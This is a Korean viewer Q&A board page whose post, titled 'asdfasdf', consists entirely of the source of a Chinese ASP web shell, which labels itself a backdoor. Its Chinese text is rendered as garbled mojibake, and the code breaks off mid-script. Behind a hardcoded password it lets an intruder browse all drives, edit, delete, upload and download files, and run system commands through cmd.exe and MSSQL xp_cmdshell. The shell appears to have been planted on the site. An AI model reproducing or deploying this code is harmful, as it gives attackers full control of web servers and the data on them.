시청자참여

homeHOME > 시청자참여 > Q&A > 이전 Q&A

이전 Q&A

asdfasdf

작성자 : adfasdf 작성일 : 2005.10.10 11:53 조회 : 1937

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<TITLE>붚?鬼戴몸훙쳄뺏경</TITLE>
<style>

</STYLE>
<%@ LANGUAGE = VBScript.Encode codepage ="936" %>
<%Server.ScriptTimeOut=5000%>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
on error resume next
dim Data_5xsoft
Class upload_5xsoft
dim objForm,objFile,Version
Public function Form(strForm)
    strForm=lcase(strForm)
    if not objForm.exists(strForm) then
        Form=""
    else
        Form=objForm(strForm)
    end if
end function

Public function File(strFile)
    strFile=lcase(strFile)
    if not objFile.exists(strFile) then
        set File=new FileInfo
    else
        set File=objFile(strFile)
    end if
end function

Private Sub Class_Initialize
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="HTTP?눈넋埼 Version 2.0 By:Bingo~!"
set objForm=Server.CreateObject("Scripting.Dictionary")
set objFile=Server.CreateObject("Scripting.Dictionary")
if Request.TotalBytes<1 then Exit Sub
set tStream = Server.CreateObject("adodb.stream")
set Data_5xsoft = Server.CreateObject("adodb.stream")
Data_5xsoft.Type = 1
Data_5xsoft.Mode =3
Data_5xsoft.Open
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData =Data_5xsoft.Read

iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) < iFormEnd
    iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
    tStream.Type = 1
    tStream.Mode =3
    tStream.Open
    Data_5xsoft.Position = iFormStart
    Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart
    tStream.Position = 0
    tStream.Type = 2
    tStream.Charset ="gb2312"
    sInfo = tStream.ReadText
    tStream.Close
    iFormStart = InStrB(iInfoEnd,RequestData,sStart)
    iFindStart = InStr(22,sInfo,"name=""",1)+6
    iFindEnd = InStr(iFindStart,sInfo,"""",1)
    sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
    if InStr (45,sInfo,"filename=""",1) > 0 then
        set theFile=new FileInfo
        iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
        iFindEnd = InStr(iFindStart,sInfo,"""",1)
        sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
        theFile.FileName=getFileName(sFileName)
        theFile.FilePath=getFilePath(sFileName)
        iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
        iFindEnd = InStr(iFindStart,sInfo,vbCr)
        theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
        theFile.FileStart =iInfoEnd
        theFile.FileSize = iFormStart -iInfoEnd -3
        theFile.FormName=sFormName
        if not objFile.Exists(sFormName) then
         objFile.add sFormName,theFile
        end if
    else
        tStream.Type =1
        tStream.Mode =3
        tStream.Open
        Data_5xsoft.Position = iInfoEnd
        Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3
        tStream.Position = 0
        tStream.Type = 2
        tStream.Charset ="gb2312"
     sFormValue = tStream.ReadText
     tStream.Close
        if objForm.Exists(sFormName) then
         objForm(sFormName)=objForm(sFormName)&", "&sFormValue
        else
         objForm.Add sFormName,sFormValue
        end if
    end if
    iFormStart=iFormStart+iStart+1
    wend
RequestData=""
set tStream =nothing
End Sub

Private Sub Class_Terminate
if Request.TotalBytes>0 then
    objForm.RemoveAll
    objFile.RemoveAll
    set objForm=nothing
    set objFile=nothing
    Data_5xsoft.Close
    set Data_5xsoft =nothing
end if
End Sub

Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function

Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
End Class

Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub

Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="qtghbfrbfz" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
</head>

<body>
<%if request.form("password")<>"" then
response.write "쒸멩:鬼湳~콱拳맴찍？쵱쯤꼇뚤！！"
end if
%>

<table border="0" width="100%" height="317" bgcolor="#FFFFFF" cellpadding="3"
bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF" cellspacing="0">
<tr>
<td width="100%" height="229"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center>
        <p>　</p>
</center></div>
        <div align="center"><center>
            <p><font face="Webdings" color="red" size="2">2 </font>
            <font size="2" color="red">헝渴흙쵱쯤：</font> <font size="1">
            <INPUT TYPE=password NAME=password style="border:1px solid red; " size="18"> 
            <INPUT TYPE=submit VALUE="Bingo~!" style="border:1px solid red; " name="B3"></font></p>
</center></div>
        <div align="center"><center>
            <p>　</p>
</center></div>
        <div align="center"><center><font color=red>굵굵챔&굵굵戴</font><br>
            <p><font color="red">::붚?鬼戴:: 쒔듕Topic.Asp빈쳔 (2005-?)beta붚?鬼戴淚痰경<br>넋埼  붚?鬼戴淚痰경</font></p>
</center></div>
        <div align="center"><center>
            <p>  </p>
</center></div>
</form>
</td>
</tr>
</table>
</body><body>
<script language="JavaScript">

</script></body>
</html>
<%end if%>

<%case "down.asp"
call downloadFile(request("path"))
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear%>
<object runat=server id=s scope=page classid="clsid:00000566-0000-0010-8000-00AA006D2EA4"></object>
<%s.Open
s.Type = 1
if not oFileSys.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
Response.End
end if
Set f = oFileSys.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
%>
<%case "list.asp"%>
<%
urlpath=server.urlencode(path)
if Request.Cookies("password")="7758521" then
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
Sub GetFolder()
dim theFolder,theSubFolders
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write"<a href='" & rseb & "?q=list.asp&path="&Request("oldpath")&"&attrib="&attrib&"'><font color='#FF8000'>⊆</font>∧<font color='ff2222'>쀼?섬커쩌</font></a><br><script language=vbscript>"
For Each x In theSubFolders
%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"
<%
Next
%></script><%
end if
End Sub

Sub GetFile()
dim theFiles
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"<table border='0' width='100%' cellpadding='0'><script language=vbscript>"
For Each x In theFiles
if Request("attrib")="true" then
showstring=x.Name
else
showstring=x.Name
end if
%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"
<%
Next
end if
Response.write"</script></table>"
End Sub
%>
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<style type="text/css">

</style>
</head>
<script language="JavaScript">
function crfile(ls)
{if (ls==""){alert("헝渴흙匡숭츰!");}
else {window.open("<%=rseb%>?q=edit.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
return false;
}
function crdir(ls)
{if (ls==""){alert("헝渴흙匡숭츰!");}
else {window.open("<%=rseb%>?q=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
return false;
}
</script>
<script language="vbscript">
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write "<tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = '#FFCC00'"" onMouseOut=""this.style.backgroundColor = '#FFefdf'""><td width='50%'><font color='#FF8000'><font face=Wingdings>+</font></font><a href='"& urlpath & lpath & xName &"' target='_blank'><strong>" & showstring & "</strong></a></td><td width='20%' align='right'>" & size & "俚쌘</td><td width='30%'><a href='#' title='잚謹：" & type1 & chr(10) & "橄昑：" & Attributes & chr(10) & "珂쇌：" & DateLastModified &"'>橄昑</a> <a href='<%=rseb%>?q=edit.asp&path=" & lpath & xName & "&attrib=" & attrib &"' target='_blank' ><font color='#FF8000' ></font>긍서</a> <a href="&chr(34)&"javascript: rmdir1('"& lpath & xName &"')"&chr(34)&"><font color='#FF8000' ></font>?뇜</a> <a href='#' onclick=copyfile('" & lpath & Name & "')><font color='#FF8000' ></font>릿齡</a> <a href='<%=rseb%>?q=down.asp&path=<%=cpath%>\"&xName&"&attrib=" & attrib &"' target='_blank' ><font color='#FF8000' ></font>苟潼</a></td></tr>"
end sub
sub so(lpath,xName,path,attrib)
document.write "<a href='<%=rseb%>?q=list.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &"'>㈇<font color='#FF8000'><font face=Wingdings>1</font></font> " & xName &"</a> <a href="&chr(34)&"javascript: rmdir('"& lpath & xName &"')"&chr(34)&"><font color='#FF8000' ></font>?뇜</a><br>"
end sub

sub rmdir1(ls)
if confirm("鬧雷！콱廬돨狼?뇜侶몸匡숭찐!"&Chr(13)&Chr(10)&"匡숭槨："&ls) then
window.open("<%=rseb%>?q=edit.asp&path=" & ls & "&op=del&attrib=<%=request("attrib")%>")
end if
end sub

sub rmdir(ls)
if confirm("仝！콱廬돨狼?뇜侶몸커쩌찐!"&Chr(13)&Chr(10)&"커쩌槨："&ls) then
window.open("<%=rseb%>?q=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub

sub copyfile(sfile)
dfile=InputBox("⊃匡숭릿齡⊃"&Chr(13)&Chr(10)&"都匡숭："&sfile&Chr(13)&Chr(10)&"渴흙커깃匡숭돨匡숭츰:"&Chr(13)&Chr(10)&"[豚冀던쨌쓺,狼몽앴콱돨뎠품쨌쓺친駕]")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
if dfile<>"" then
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "뚤꼇폅，콱瞳宮뚤쨌쓺친駕苟꼇콘賈痰없뚤쨌쓺"&Chr(13)&Chr(10)&"댄轎쨌쓺：["&dfile&"]"
exit sub
end if
else
lp="<%=lpath%>"
end if
window.open("<%=rseb%>?q=edit.asp&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"퀭청唐渴흙匡숭츰！"
end If
end sub
</script>
<body>
<table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000"
bordercolordark="#FFFFFF" cellspacing="0">
<tr>
<td width="755" bgcolor="#000080" colspan="2" height="23"><p align="center"><font size="3"
color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">⊃뻣턍：<span
style="background-color: rgb(255,255,255);color:rgb(255,0,0)"><%
For Each thing in oFileSys.Drives
Response.write "<font face=Wingdings>:</font><a href='" & rseb & "?q=list.asp&path="&thing.DriveLetter&":&attrib=true'>"&thing.DriveLetter&":</a>"
NEXT
set oScriptNet=Server.CreateObject("WScript.Network")
%> </span> 뒈囹：
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">⊃<%
if Request("attrib")="true" then
response.write "<a href='" & rseb & "?q=list.asp'>학돕宮뚤쨌쓺</a>"
else
response.write "<a href='" & rseb & "?attrib=true&q=list.asp'>학돕없뚤쨌쓺</a>"
end if
%>  ⊃없뚤:<span
style="background-color: rgb(255,255,255)"><%=cpath%></span></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">⊃뎠품<font face="Wingdings" color="#FF8000">1</font>:<span style="background-color: rgb(255,255,255)"><%=lpath%></span> </td>
</tr><form name="form1" method="post" action="<%=rseb%>?q=upfile.asp" target="_blank" enctype="multipart/form-data">
<tr><td bgcolor="#C0C0C0" colspan="2" style="height: 20px">

긍서|
<input class="tx1" type="text" name="filename" size="20">
<input class="tx1" type="button" value="쉔匡숭" onclick="crfile(form1.filename.value)">
<input class="tx1" type="button" value="쉔커쩌" onclick="crdir(form1.filename.value)">
<input type="file" name="file1" class="tx1" style="width:100" value="">
<input type="text" name="filepath" class="tx1" style="width:100" value="<%=cpath%>">
<input type="hidden" name="act" value="upload">
<input type="hidden" name="upcount" class="tx" value="1">
<input class="tx1" type="submit" value="?눈">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=cmd.asp','_blank')" value="츱즈">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=test.asp','_blank')" value="토零">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=p.asp','_blank')" value="nfso">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=sql.asp','_blank')" value="sql">
</td>
</td>
</tr></form>
<tr>
<td width="169" valign="top" bgcolor="#C8E3FF"><%Call GetFolder()%>
</td>
<td width="582" valign="top" bgcolor="#FFefdf"><%Call GetFile()%>
</td>
</tr>
</table>
<%else
response.write "쒸멩:鬼湳~콱拳맴찍？쵱쯤꼇뚤！！"
response.write "<a href='" & rseb & "?q=" & rseb & "'>±럿 쀼×</a>"
end if
%>
</body>
</html>
<%case "edit.asp"%>
<html>

<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">
<title>긍서都덜쯤</title>
<style>

</style>
</head>

<body>
<% '뗍匡숭
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.Delete True
Response.write "<script>alert('?뇜냥묘！狼岬劤꼽콘였돕槻벎');window.close();</script>"
else
if request("op")="copy" then
if Request("attrib")="true" then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.copy dsfile
%>
<script language=vbscript>
msgbox "都匡숭：<%=whichfile%>" & vbcrlf & "커돨匡숭:<%=dsfile%>" & vbcrlf & "릿齡냥묘！狼岬劤꼽콘였돕槻벎!"
window.close()
</script>
<%
else
if request.form("text")="" then
if Request("creat")<>"yes" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)
counter=0
thisline=thisfile.readall
thisfile.Close
set fs=nothing
end if
%>

<form method="POST" action="<%=rseb%>?q=edit.asp">
<input type="hidden" name="attrib" value="<%=Request("attrib")%>"><table border="0"
width="700" cellpadding="0">
<tr>
<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><%=httpt%></td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA">匡숭츰：<input type="text" name="path" size="45"
value="<%=Request("path")%> ">殮쌈뫘맣匡숭츰，宮뎠黨“쥼닸槨”</td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA"><textarea rows="25" name="text" cols="90"><%=thisline%></textarea></td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><input type="submit"
value="瓊슥" name="B1"><input type="reset" value="릿覩" name="B2"></td>
</tr>
</table>
</form>
<%else
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set outfile=oFileSys.CreateTextFile(whichfile)
outfile.WriteLine Request("text")
outfile.close
set fs=nothing
Response.write "<script>alert('錦맣냥묘！狼岬劤꼽콘였돕槻벎');window.close();</script>"
end if
end if
end if
else
response.write "쒸멩:鬼湳~콱拳맴찍？쵱쯤꼇뚤！！"
response.write "<a href='" & rseb & "?q=" & rseb & "'>±럿 쀼×</a>"
end if

%>
</body>
</html>
<%case "edir.asp"%>
<html>

<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">
<title>커쩌꾸鱗</title>
<style>

</style>
</head>

<body>
<% '뗍匡숭
if Request.Cookies("password")="7758521" then

if request("op")="del" then

if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.DeleteFolder whichdir,True
Response.write "<script>alert('?뇜돨커쩌槨:" & whichdir & "?뇜냥묘！狼岬劤꼽콘였돕槻벎');window.close();</script>"

else

if request("op")="creat" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.CreateFolder whichdir
Response.write "<script>alert('쉔접돨커쩌槨:" & whichdir & "쉔접냥묘！狼岬劤꼽콘였돕槻벎');window.close();</script>"
end if
end if
else
response.write "쒸멩:鬼湳~콱拳맴찍？쵱쯤꼇뚤！！"
response.write "<a href='" & rseb & "?q=" & rseb & "'>±럿 쀼×</a>"
end if
%>
</body>
</html>
<%
case "upfile.asp"
if Request.Cookies("password")="7758521" then
set upload=new upload_5xSoft
if upload.form("filepath")="" then
HtmEnd "헝渴흙狼?눈逞돨커쩌!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
if right(formPath,1)<>"/" then formPath=formPath&"/"
end if

iCount=0
for each formName in upload.objFile
set file=upload.file(formName)
if file.FileSize>0 then
file.SaveAs formPath & file.FileName
response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 냥묘!<br>"
iCount=iCount+1
end if
set file=nothing
next
set upload=nothing
Htmend iCount&" 몸匡숭?눈써監!"

sub HtmEnd(Msg)
set upload=nothing
Response.write "?눈供귄！狼岬劤꼽콘였돕槻벎！<P><input value=밑균 type=button onclick=window.close();>"
response.end
end sub
else
response.write "쒸멩:鬼湳~콱拳맴찍？쵱쯤꼇뚤！！"
response.write "<a href='" & rseb & "?q=" & rseb & "'>±럿 쀼×</a>"
end if

case "cmd.asp"

if Request.Cookies("password")<>"7758521" then
response.write "쒸멩:鬼湳~콱拳맴찍？쵱쯤꼇뚤！！"
response.write "<a href='" & rseb & "?q=" & rseb & "'>±럿 쀼×</a>"
else%>
<title>ASP Shell</title>
<HTML>
<BODY>
<FORM action="<%=rseb%>?q=cmd.asp" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="獵契츱즈">
</FORM>
<PRE>
</BODY>
</HTML>
<%
set oScript=Server.CreateObject("WScript.Shell")
On Error Resume Next
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
response.write oScript.exec ("cmd.exe /c "& szCMD).stdout.readall
End If
end if
case "sql.asp"
if Request.Cookies("password")<>"7758521" then
response.write "쒸멩:鬼湳~콱拳맴찍？쵱쯤꼇뚤！！"
response.write "<a href='" & rseb & "?q=" & rseb & "'>±럿 쀼×</a>"
else
If trim(request.form("sqlcmd"))<>"" Then
password= trim(Request.form("pa"))
id=trim(Request.form("id"))
SqlLocalName=trim(Request.form("SqlLocalName"))
if SqlLocalName="" or SqlLocalName="mssql륩蛟포뒈囹" then SqlLocalName="127.0.0.1"
set adoConn=Server.CreateObject("ADODB.Connection")
adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id&";Data Source ="&SqlLocalName
strQuery = "exec master.dbo.xp_cmdshell '" & request.form("sqlcmd") & "'"
set recResult = adoConn.Execute(strQuery)
If NOT recResult.EOF Then
Do While NOT recResult.EOF
strResult = strResult & chr(13) & recResult(0)
recResult.MoveNext
Loop
End if
set recResult = Nothing
strResult = Replace(strResult," "," ")
strResult = Replace(strResult,"<","<")
strResult = Replace(strResult,">",">")
strResult = Replace(strResult,chr(13),"<br>")
End if
set adoConn = Nothing
%><table border=0 width=500 cellspacing=0 cellpadding=0 bgcolor="#B8B8B8">
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<form name="form" method=post action="<%=rseb%>?q=sql.asp">
<input type="text" name="sqlcmd" size=70 > <br>
<input type="text" name="id" size=10 value="mssql痰빵츰">
<input type="text" name="pa" size=20 value="mssql쵱쯤">
<input type="text" name="SqlLocalName" size=20 value="mssql륩蛟포뒈囹">
<input type="submit" value="獵契츱즈">
</form></tr></table>
<%
Response.Write request.form("sqlcmd") & "<br><br>"
Response.Write strResult
end if
case "test.asp"
Response.Buffer = False
public IsObj,VerObj,TestObj
dim i
for i=0 to 25
    on error resume next
    IsObj=false
    VerObj=""
    TestObj=""
    set TestObj=server.CreateObject(ObjTotest(i,0))
    If -2147221005 <> Err then
        IsObj = True
        VerObj = TestObj.version
        if VerObj="" or isnull(VerObj) then VerObj=TestObj.about
    end if
    ObjTotest(i,2)=IsObj
    ObjTotest(i,3)=VerObj
next
sub ObjTest(strObj)
    on error resume next
    IsObj=false
    VerObj=""
    TestObj=""
    set TestObj=server.CreateObject (strObj)
    If -2147221005 <> Err then
        IsObj = True
        VerObj = TestObj.version
        if VerObj="" or isnull(VerObj) then VerObj=TestObj.about
    end if
End sub
%><HTML><BODY>
<table border=0 width=450 cellspacing=0 cellpadding=0 bgcolor="#3F8805">
<tr><td>

    <table border=0 width=450 cellspacing=1 cellpadding=0>
     <tr bgcolor="#EEFEE0" height=18>
        <td align=left> 륩蛟포츰</td><td> <%=Request.ServerVariables("SERVER_NAME")%></td>
     </tr>
     <tr bgcolor="#EEFEE0" height=18>
        <td align=left> 륩蛟포IP</td><td> <%=Request.ServerVariables("LOCAL_ADDR")%></td>
     </tr>
     <tr bgcolor="#EEFEE0" height=18>
        <td align=left> 륩蛟포똥왯</td><td> <%=Request.ServerVariables("SERVER_PORT")%></td>
     </tr>
     <tr bgcolor="#EEFEE0" height=18>
        <td align=left> 륩蛟포珂쇌</td><td> <%=now%></td>
     </tr>
     <tr bgcolor="#EEFEE0" height=18>
        <td align=left> IIS경굶</td><td> <%=Request.ServerVariables("SERVER_SOFTWARE")%></td>
     </tr>
     <tr bgcolor="#EEFEE0" height=18>
        <td align=left> 신굶낚珂珂쇌</td><td> <%=Server.ScriptTimeout%> 취</td>
     </tr>
     <tr bgcolor="#EEFEE0" height=18>
        <td align=left> 굶匡숭쨌쓺</td><td> <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></td>
     </tr>
     <tr bgcolor="#EEFEE0" height=18>
        <td align=left> 륩蛟포CPU鑒좆</td><td> <%=Request.ServerVariables("NUMBER_OF_PROCESSORS")%> 몸</td>
     </tr>
     <tr bgcolor="#EEFEE0" height=18>
        <td align=left> 륩蛟포썩陋多헐</td><td> <%=ScriptEngine & "/"& ScriptEngineMajorVersion &"."&ScriptEngineMinorVersion&"."& ScriptEngineBuildVersion %></td>
     </tr>
     <tr bgcolor="#EEFEE0" height=18>
        <td align=left> 륩蛟포꾸鱗溝固</td><td> <%=Request.ServerVariables("OS")%></td>
     </tr>
    </table>

</td></tr>
</table>
<br>
<font class=fonts>莉숭連넣헙워</font>
<%
Dim strClass
    strClass = Trim(Request.Form("classname"))
    If strClass<>"" or strClas1<>"" then
    Response.Write "<br>퀭寧땍돨莉숭돨쇱꿴써벎："
    Dim Verobj1
    ObjTest(strClass)
     If Not IsObj then
        Response.Write "<br><font color=red>붤瑙볘，맡륩蛟포꼇連넣 " & strclass & " 莉숭！</font>"
     Else
        if VerObj="" or isnull(VerObj) then
            Verobj1="轟랬혤돤맡莉숭경굶"
        Else
            Verobj1="맡莉숭경굶角：" & VerObj
        End If
        Response.Write "<br><font class=fonts>묜毆！맡륩蛟포連넣 " & strclass & " 莉숭。" & verobj1 & "</font>"
     End If
     Response.Write "<br>"
    end if
    %>
<font class=fonts>페儉莉숭連넣헙워쇱꿎</font><br>
瞳苟충돨渴흙움櫓渴흙콱狼쇱꿎돨莉숭돨ProgId샀ClassId。
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450">
<FORM action=<%=rseb%>?q=test.asp method=post id=form1 name=form1>
    <tr height="18" class=backq>
        <td align=center height=30><input class=input type=text value="" name="classname" size=40>
<INPUT type=submit value=" 횅 땍 " class=backc id=submit1 name=submit1>
<INPUT type=reset value=" 路輕 " class=backc id=reset1 name=reset1>
</td>
     </tr>
</FORM>
</table>
<%case "p.asp"%>
<%if Request.Cookies("password")="7758521" then %>
<%response.write "<font class=fonts>鬧雷:첼늴怜콘獵契寧몸꾸鱗</font>" %>
뎠품珂쇌:<%response.write now()%><BR>넋埼杰瞳돨膠잿쨌쓺：
<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
<html>
<title>asp.backdoor </title>
<style>

</STYLE>
<body bgcolor="#C0C0C0" text="#000000">
<table border=0 width=500 cellspacing=0 cellpadding=0 class="noborder"><tr bgcolor="#EEEEEE" height=18 class="noborder" style='table-layout:fixed; word-break:break-all'><td align=left>
<form action="<%= Request.ServerVariables("URL") %>?q=p.asp" method="post">
<input type=text name=text value="<%=DSnXA %>"> <font class=fonts>渴흙狼啞응돨커쩌,離빈狼속\</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<input type=text name=text1 value="<%=DSnXA1 %>">
copy
<input type=text name=text2 value="<%=DSnXA2 %>"> <font class=fonts>커돨뒈囹꼇狼던匡숭츰</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<input type=text name=text3 value="<%=DSnXA3 %>">
move
<input type=text name=text4 value="<%=DSnXA4 %>"><font class=fonts> 커돨뒈囹꼇狼던匡숭츰</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
쨌쓺：<input type=text name=text5 value="<%=DSnXA5 %>" >
넋埼：<input type=text name=text6 value="<%=DSnXA6 %>" ><font class=fonts> 꼇옵鹿속꽝鑒</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left><input type="text" name="ok" size=55><font class=fonts> CMD츱즈뚤뺐움</font>
</td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left><input type=text name=pathlcx size=55><font class=fonts> 쨌쓺宅匡숭츰</font></td>
<tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<textarea cols=80 rows=5 name=textlcx >
<%
set oScript=Server.CreateObject("WScript.Shell")
ok=Request("ok")
if ok<>"" then response.write oScript.exec ("cmd.exe /c "& ok).stdout.readall
%></textarea>
<input type=submit name=sb value=츱즈 class=input>
</form></td></tr>
</table>
</center>
<%
Response.Write request.form("cmd") & "<br><br>"
Response.Write strResult
DSnXA = Request.Form("text") '커쩌啞응
if (DSnXA <> "") then
set shell=server.createobject("shell.application") '쉔접shell뚤蹶
set fod1=shell.namespace(DSnXA)
set foditems=fod1.items
for each co in foditems
response.write "<font color=black>" & co.path & "-----" & co.size & "</font><br>"
next
end if
DSnXA1 = Request.Form("text1") '커쩌옙굔，꼇콘쏵契匡숭옙굔
DSnXA2 = Request.Form("text2")
if DSnXA1<>"" and DSnXA2<>"" then
set shell1=server.createobject("shell.application") '쉔접shell뚤蹶
set fod1=shell1.namespace(DSnXA2)
for i=len(DSnXA1) to 1 step -1
if mid(DSnXA1,i,1)="\" then
path=left(DSnXA1,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA1,len(DSnXA1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
DSnXA3 = Request.Form("text3") '커쩌盧땡
DSnXA4 = Request.Form("text4")
if DSnXA3<>"" and DSnXA4<>"" then
set shell2=server.createobject("shell.application") '쉔접shell뚤蹶
set fod1=shell2.namespace(DSnXA4)

for i=len(DSnXA3) to 1 step -1
if mid(DSnXA3,i,1)="\" then
path=left(DSnXA3,i-1)
exit for
end if
next

if len(path)=2 then path=path & "\"
path2=right(DSnXA3,len(DSnXA3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
DSnXA5 = Request.Form("text5") '獵契넋埼狼寧땍쨌쓺
